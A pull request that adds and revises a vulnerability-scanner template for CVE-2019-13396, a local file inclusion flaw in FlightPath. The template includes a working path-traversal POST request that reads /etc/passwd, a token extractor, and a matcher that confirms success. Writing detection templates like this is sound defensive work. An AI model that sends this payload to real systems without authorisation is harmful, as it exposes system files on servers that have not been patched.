### PR TITLE
Create CVE-2019-13396.yaml

### DIFF
--- a/CVE-2019-13396.yaml
+++ b/CVE-2019-13396.yaml
@@ -1,0 +1,37 @@
+id: CVE-2019-13396
+info:
+  name: FlightPath Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
+  reference:
+    - https://www.cvedetails.com/cve/CVE-2019-13396/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2019-13396
+    cwe-id: CWE-22
+  tags: cve,cve2021,metabase,lfi
+
+requests:
+  - raw:
+      - |
+        POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        condition: or
+
+      - type: status
+        status:
+          - 200

--- a/CVE-2019-13396.yaml
+++ b/CVE-2019-13396.yaml
@@ -12,7 +12,7 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2019-13396
     cwe-id: CWE-22
-  tags: cve,cve2021,metabase,lfi
+  tags: cve,cve2019,flightpath,lfi
 
 requests:
   - raw:

--- a/cves/2019/CVE-2019-13396.yaml
+++ b/cves/2019/CVE-2019-13396.yaml
@@ -1,7 +1,7 @@
 id: CVE-2019-13396
 info:
   name: FlightPath Local File Inclusion
-  author: 0x_Akoko
+  author: 0x_Akoko,daffainfo
   severity: high
   description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
   reference:
@@ -18,18 +18,32 @@ info:
 requests:
   - raw:
       - |
-        POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+        GET /login HTTP/1.1
         Host: {{Hostname}}
 
-        callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
+      - |
+        POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
 
     matchers-condition: and
     matchers:
       - type: regex
-        part: body
         regex:
           - "root:.*:0:0:"
 
       - type: status
         status:
           - 200
+
+    extractors:
+      - type: regex
+        name: token
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "idden' name='form_token' value='([a-z0-9]+)'>"

--- a/cves/2019/CVE-2019-13396.yaml
+++ b/cves/2019/CVE-2019-13396.yaml
@@ -5,6 +5,7 @@ info:
   severity: high
   description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
   reference:
+    - https://www.exploit-db.com/exploits/47121
     - https://www.cvedetails.com/cve/CVE-2019-13396/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
   classification:
@@ -19,18 +20,15 @@ requests:
       - |
         POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
         Host: {{Hostname}}
-        Accept: application/json, text/plain, */*
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
         callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
 
     matchers-condition: and
     matchers:
-
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        condition: or
 
       - type: status
         status:


### PR DESCRIPTION
### Template / PR Information

### FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion

**Authentication : Not required (Authentication is not required to exploit the vulnerability.)**

Vendor Homepage: http://getflightpath.com
Software Link: http://getflightpath.com/project/9/releases
Version Affected: < 4.8.2 & < 5.0-rc2
 CVE : CVE-2019-13396
- Reference:
    - https://www.cvedetails.com/cve/CVE-2019-13396/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
    
### Template Validation

I've validated this template locally?
- YES